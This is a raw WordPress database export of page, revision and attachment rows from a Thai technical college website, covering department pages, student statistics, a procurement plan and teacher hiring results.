(3233, 3, '2018-06-27 10:16:18', '2018-06-27 03:16:18', '<img class=\"aligncenter size-full wp-image-3232\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-15-09.jpg\" alt=\"\" width=\"194\" height=\"245\" /> <img class=\"aligncenter wp-image-3230\" src=\"/wp-content/uploads/2018/06/27-6-2561-9-47-06-300x80.jpg\" alt=\"\" width=\"380\" height=\"101\" /> <img class=\"aligncenter wp-image-3231 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-12-06.jpg\" alt=\"\" width=\"956\" height=\"345\" />', 'เทคโนโลยียางและพอลิเมอร์', '', 'inherit', 'closed', 'closed', '', '3229-revision-v1', '', '', '2018-06-27 10:16:18', '2018-06-27 03:16:18', '', 3229, 'http://www.technicrayong.ac.th/3229-revision-v1/', 0, 'revision', '', 0),
(3234, 3, '2018-06-27 10:16:27', '2018-06-27 03:16:27', '<img class=\"aligncenter size-full wp-image-3232\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-15-09.jpg\" alt=\"\" width=\"194\" height=\"245\" /> <img class=\"aligncenter wp-image-3230\" src=\"/wp-content/uploads/2018/06/27-6-2561-9-47-06-300x80.jpg\" alt=\"\" width=\"380\" height=\"101\" /> <img class=\"aligncenter wp-image-3231 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-12-06.jpg\" alt=\"\" width=\"956\" height=\"345\" />', 'เทคโนโลยียางและพอลิเมอร์', '', 'inherit', 'closed', 'closed', '', '3229-autosave-v1', '', '', '2018-06-27 10:16:27', '2018-06-27 03:16:27', '', 3229, 'http://www.technicrayong.ac.th/3229-autosave-v1/', 0, 'revision', '', 0),
(3235, 3, '2018-06-27 11:24:00', '2018-06-27 04:24:00', '<img class=\"aligncenter size-full wp-image-3237\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-59-50.jpg\" alt=\"\" width=\"194\" height=\"241\" /> <img class=\"aligncenter wp-image-3236\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-59-36-300x80.jpg\" alt=\"\" width=\"379\" height=\"101\" />\r\n\r\n<a href=\"/wp-content/uploads/2018/12/20-12-2561-15-12-37.png\"><img class=\"aligncenter size-full wp-image-4809\" src=\"/wp-content/uploads/2018/12/20-12-2561-15-12-37.png\" alt=\"\" width=\"1004\" height=\"669\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/20-12-2561-15-12-57.png\"><img class=\"aligncenter size-full wp-image-4810\" src=\"/wp-content/uploads/2018/12/20-12-2561-15-12-57.png\" alt=\"\" width=\"1006\" height=\"330\" /></a>\r\n\r\n \r\n\r\n ', 'การบัญชี', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%b1%e0%b8%8d%e0%b8%8a%e0%b8%b5', '', '', '2018-12-20 15:15:05', '2018-12-20 08:15:05', '', 0, 'http://www.technicrayong.ac.th/?page_id=3235', 0, 'page', '', 0),
(3236, 3, '2018-06-27 11:23:00', '2018-06-27 04:23:00', '', '27-6-2561 10-59-36', '', 'inherit', 'closed', 'closed', '', '27-6-2561-10-59-36', '', '', '2018-06-27 11:23:00', '2018-06-27 04:23:00', '', 3235, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/27-6-2561-10-59-36.jpg', 0, 'attachment', 'image/jpeg', 0),
(3237, 3, '2018-06-27 11:23:05', '2018-06-27 04:23:05', '', '27-6-2561 10-59-50', '', 'inherit', 'closed', 'closed', '', '27-6-2561-10-59-50', '', '', '2018-06-27 11:23:05', '2018-06-27 04:23:05', '', 3235, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/27-6-2561-10-59-50.jpg', 0, 'attachment', 'image/jpeg', 0),
(3240, 3, '2018-06-27 11:24:00', '2018-06-27 04:24:00', '<img class=\"aligncenter size-full wp-image-3237\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-59-50.jpg\" alt=\"\" width=\"194\" height=\"241\" /> <img class=\"aligncenter wp-image-3236\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-59-36-300x80.jpg\" alt=\"\" width=\"379\" height=\"101\" /> <img class=\"aligncenter wp-image-3238 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-11-14-49.jpg\" alt=\"\" width=\"956\" height=\"626\" /> <img class=\"aligncenter wp-image-3239 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-11-24-12.jpg\" alt=\"\" width=\"956\" height=\"319\" />', 'การบัญชี', '', 'inherit', 'closed', 'closed', '', '3235-revision-v1', '', '', '2018-06-27 11:24:00', '2018-06-27 04:24:00', '', 3235, 'http://www.technicrayong.ac.th/3235-revision-v1/', 0, 'revision', '', 0),
(3243, 3, '2018-06-27 15:03:04', '2018-06-27 08:03:04', '', '27-6-2561 14-58-31', '', 'inherit', 'closed', 'closed', '', '27-6-2561-14-58-31', '', '', '2018-06-27 15:03:04', '2018-06-27 08:03:04', '', 3217, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/27-6-2561-14-58-31.jpg', 0, 'attachment', 'image/jpeg', 0),
(3244, 3, '2018-06-27 15:03:09', '2018-06-27 08:03:09', '', '27-6-2561 15-02-29', '', 'inherit', 'closed', 'closed', '', '27-6-2561-15-02-29', '', '', '2018-06-27 15:03:09', '2018-06-27 08:03:09', '', 3217, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/27-6-2561-15-02-29.jpg', 0, 'attachment', 'image/jpeg', 0),
(3245, 3, '2018-06-27 15:04:18', '2018-06-27 08:04:18', '<img class=\"aligncenter wp-image-3244 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-02-29.jpg\" alt=\"\" width=\"793\" height=\"553\" />\r\n\r\n<img class=\"aligncenter wp-image-3243 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-14-58-31.jpg\" alt=\"\" width=\"878\" height=\"383\" />\r\n\r\n \r\n\r\n ', 'ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '3217-revision-v1', '', '', '2018-06-27 15:04:18', '2018-06-27 08:04:18', '', 3217, 'http://www.technicrayong.ac.th/3217-revision-v1/', 0, 'revision', '', 0),
(3246, 3, '2018-06-27 15:38:09', '2018-06-27 08:38:09', '', '27-6-2561 15-39-56', '', 'inherit', 'closed', 'closed', '', '27-6-2561-15-39-56', '', '', '2018-06-27 15:38:09', '2018-06-27 08:38:09', '', 3217, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/27-6-2561-15-39-56.jpg', 0, 'attachment', 'image/jpeg', 0),
(3247, 3, '2018-06-27 15:38:42', '2018-06-27 08:38:42', '<img class=\"aligncenter wp-image-3244 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-02-29.jpg\" alt=\"\" width=\"793\" height=\"553\" />\r\n\r\n<img class=\"aligncenter wp-image-3243 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-14-58-31.jpg\" alt=\"\" width=\"878\" height=\"383\" />\r\n\r\n<img class=\"aligncenter wp-image-3246 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-39-56.jpg\" alt=\"\" width=\"1104\" height=\"593\" />\r\n\r\n \r\n\r\n ', 'ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '3217-revision-v1', '', '', '2018-06-27 15:38:42', '2018-06-27 08:38:42', '', 3217, 'http://www.technicrayong.ac.th/3217-revision-v1/', 0, 'revision', '', 0),
(3248, 3, '2018-06-27 15:42:35', '2018-06-27 08:42:35', '', '27-6-2561 15-44-00', '', 'inherit', 'closed', 'closed', '', '27-6-2561-15-44-00', '', '', '2018-06-27 15:42:35', '2018-06-27 08:42:35', '', 3217, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/27-6-2561-15-44-00.jpg', 0, 'attachment', 'image/jpeg', 0),
(3250, 3, '2018-06-27 15:45:05', '2018-06-27 08:45:05', '', '27-6-2561 15-46-00', '', 'inherit', 'closed', 'closed', '', '27-6-2561-15-46-00', '', '', '2018-06-27 15:45:05', '2018-06-27 08:45:05', '', 3217, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/27-6-2561-15-46-00.jpg', 0, 'attachment', 'image/jpeg', 0),
(3251, 3, '2018-06-27 15:45:53', '2018-06-27 08:45:53', '<img class=\"aligncenter wp-image-3244 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-02-29.jpg\" alt=\"\" width=\"793\" height=\"553\" />\r\n\r\n<img class=\"aligncenter wp-image-3243 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-14-58-31.jpg\" alt=\"\" width=\"878\" height=\"383\" />\r\n\r\n<img class=\"aligncenter wp-image-3246 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-39-56.jpg\" alt=\"\" width=\"1104\" height=\"593\" />\r\n\r\n<img class=\"aligncenter wp-image-3248 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-44-00.jpg\" alt=\"\" width=\"885\" height=\"500\" /> <img class=\"alignleft wp-image-3250\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-46-00.jpg\" alt=\"\" width=\"750\" height=\"724\" />\r\n\r\n \r\n\r\n ', 'ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '3217-revision-v1', '', '', '2018-06-27 15:45:53', '2018-06-27 08:45:53', '', 3217, 'http://www.technicrayong.ac.th/3217-revision-v1/', 0, 'revision', '', 0),
(3252, 3, '2018-06-27 15:47:56', '2018-06-27 08:47:56', '<img class=\"aligncenter wp-image-3244 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-02-29.jpg\" alt=\"\" width=\"793\" height=\"553\" />\r\n\r\n<img class=\"aligncenter wp-image-3243 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-14-58-31.jpg\" alt=\"\" width=\"878\" height=\"383\" />\r\n\r\n<img class=\"aligncenter wp-image-3246 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-39-56.jpg\" alt=\"\" width=\"1104\" height=\"593\" />\r\n\r\n<img class=\"aligncenter wp-image-3248 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-44-00.jpg\" alt=\"\" width=\"885\" height=\"500\" /> <img class=\"aligncenter wp-image-3250\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-46-00.jpg\" alt=\"\" width=\"700\" height=\"676\" />\r\n<h2><span style=\"color: #0000ff;\">ข้อมูลนักเรียน นักศึกษา</span> <a href=\"/ข้อมูลนักเรียน-นักศึกษ-2\"><span style=\"color: #ff0000;\">>>>คลิกที่นี่<<<</span></a></h2>\r\n<h2><span style=\"color: #0000ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา</span> <a href=\"/รายงานผลสัมฤทธิ์ทางการ\"><span style=\"color: #ff0000;\">>>>คลิกที่นี่<<<</span></a></h2>\r\n \r\n\r\n ', 'ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '3217-revision-v1', '', '', '2018-06-27 15:47:56', '2018-06-27 08:47:56', '', 3217, 'http://www.technicrayong.ac.th/3217-revision-v1/', 0, 'revision', '', 0),
(3253, 3, '2018-06-27 15:51:54', '2018-06-27 08:51:54', '<h3><a href=\"/ข้อมูลนักเรียน-นักศึกษ-3\"><span style=\"color: #0000ff;\">ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2561 <span style=\"color: #ff0000;\">NEW !!</span></span></a></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2560</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf\"> 2559</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf\"> 2558</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf\"> 2557</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf\"> 2556</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf\"> 2555</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf\"> 2554</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf\"> 2553</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf\"> 2552</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf\"> 2551</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf\"> 2550</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf\"> 2549</a></strong></span></h3>', 'ข้อมูลนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2446-revision-v1', '', '', '2018-06-27 15:51:54', '2018-06-27 08:51:54', '', 2446, 'http://www.technicrayong.ac.th/2446-revision-v1/', 0, 'revision', '', 0),
(3254, 3, '2018-06-27 16:38:10', '2018-06-27 09:38:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B9%80%E0%B8%9C%E0%B8%A2%E0%B9%81%E0%B8%9E%E0%B8%A3%E0%B9%88%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ประจำปีงบประมาณ พ.ศ.2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1-3', '', '', '2018-06-27 16:38:10', '2018-06-27 09:38:10', '', 0, 'http://www.technicrayong.ac.th/?p=3254', 375, 'post', '', 0),
(3255, 3, '2018-06-27 16:37:58', '2018-06-27 09:37:58', '', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1-3', '', '', '2018-06-27 16:37:58', '2018-06-27 09:37:58', '', 3254, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ประกาศ-เผยแพร่แผนการจัดซื้อจัดจ้าง-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(3256, 3, '2018-06-27 16:38:10', '2018-06-27 09:38:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B9%80%E0%B8%9C%E0%B8%A2%E0%B9%81%E0%B8%9E%E0%B8%A3%E0%B9%88%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ประจำปีงบประมาณ พ.ศ.2561', '', 'inherit', 'closed', 'closed', '', '3254-revision-v1', '', '', '2018-06-27 16:38:10', '2018-06-27 09:38:10', '', 3254, 'http://www.technicrayong.ac.th/3254-revision-v1/', 0, 'revision', '', 0),
(3257, 3, '2018-06-27 16:38:21', '2018-06-27 09:38:21', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B9%80%E0%B8%9C%E0%B8%A2%E0%B9%81%E0%B8%9E%E0%B8%A3%E0%B9%88%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ประจำปีงบประมาณ พ.ศ.2561', '', 'inherit', 'closed', 'closed', '', '3254-autosave-v1', '', '', '2018-06-27 16:38:21', '2018-06-27 09:38:21', '', 3254, 'http://www.technicrayong.ac.th/3254-autosave-v1/', 0, 'revision', '', 0),
(3260, 3, '2018-06-29 09:12:31', '2018-06-29 02:12:31', '', '29-6-2561 9-13-09', '', 'inherit', 'closed', 'closed', '', '29-6-2561-9-13-09', '', '', '2018-06-29 09:12:31', '2018-06-29 02:12:31', '', 3235, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/29-6-2561-9-13-09.jpg', 0, 'attachment', 'image/jpeg', 0),
(3261, 3, '2018-06-29 09:13:17', '2018-06-29 02:13:17', '<img class=\"aligncenter size-full wp-image-3237\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-59-50.jpg\" alt=\"\" width=\"194\" height=\"241\" /> <img class=\"aligncenter wp-image-3236\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-59-36-300x80.jpg\" alt=\"\" width=\"379\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-3259 size-full\" src=\"/wp-content/uploads/2018/06/29-6-2561-9-12-25.jpg\" alt=\"\" width=\"932\" height=\"635\" /> <img class=\"aligncenter wp-image-3260 size-full\" src=\"/wp-content/uploads/2018/06/29-6-2561-9-13-09.jpg\" alt=\"\" width=\"927\" height=\"332\" />', 'การบัญชี', '', 'inherit', 'closed', 'closed', '', '3235-revision-v1', '', '', '2018-06-29 09:13:17', '2018-06-29 02:13:17', '', 3235, 'http://www.technicrayong.ac.th/3235-revision-v1/', 0, 'revision', '', 0),
(3262, 3, '2018-06-29 09:15:20', '2018-06-29 02:15:20', '', '29-6-2561 9-17-22', '', 'inherit', 'closed', 'closed', '', '29-6-2561-9-17-22', '', '', '2018-06-29 09:15:20', '2018-06-29 02:15:20', '', 3235, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/29-6-2561-9-17-22.jpg', 0, 'attachment', 'image/jpeg', 0),
(3263, 3, '2018-06-29 09:15:43', '2018-06-29 02:15:43', '<img class=\"aligncenter size-full wp-image-3237\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-59-50.jpg\" alt=\"\" width=\"194\" height=\"241\" /> <img class=\"aligncenter wp-image-3236\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-59-36-300x80.jpg\" alt=\"\" width=\"379\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-3262 size-full\" src=\"/wp-content/uploads/2018/06/29-6-2561-9-17-22.jpg\" alt=\"\" width=\"935\" height=\"627\" /> <img class=\"aligncenter wp-image-3260 size-full\" src=\"/wp-content/uploads/2018/06/29-6-2561-9-13-09.jpg\" alt=\"\" width=\"927\" height=\"332\" />\r\n\r\n ', 'การบัญชี', '', 'inherit', 'closed', 'closed', '', '3235-revision-v1', '', '', '2018-06-29 09:15:43', '2018-06-29 02:15:43', '', 3235, 'http://www.technicrayong.ac.th/3235-revision-v1/', 0, 'revision', '', 0),
(3264, 3, '2018-06-29 11:12:13', '2018-06-29 04:12:13', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-5-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 5 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad-4', '', '', '2018-06-29 11:18:58', '2018-06-29 04:18:58', '', 0, 'http://www.technicrayong.ac.th/?p=3264', 374, 'post', '', 0),
(3265, 3, '2018-06-29 11:11:33', '2018-06-29 04:11:33', '', 'ประกาศ ผลการสอบคัดเลือก ครูอัตราจ้าง 5 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad-4', '', '', '2018-06-29 11:11:33', '2018-06-29 04:11:33', '', 3264, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ประกาศ-ผลการสอบคัดเลือก-ครูอัตราจ้าง-5-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(3266, 3, '2018-06-29 11:12:13', '2018-06-29 04:12:13', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-5-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 5 อัตรา', '', 'inherit', 'closed', 'closed', '', '3264-revision-v1', '', '', '2018-06-29 11:12:13', '2018-06-29 04:12:13', '', 3264, 'http://www.technicrayong.ac.th/3264-revision-v1/', 0, 'revision', '', 0),
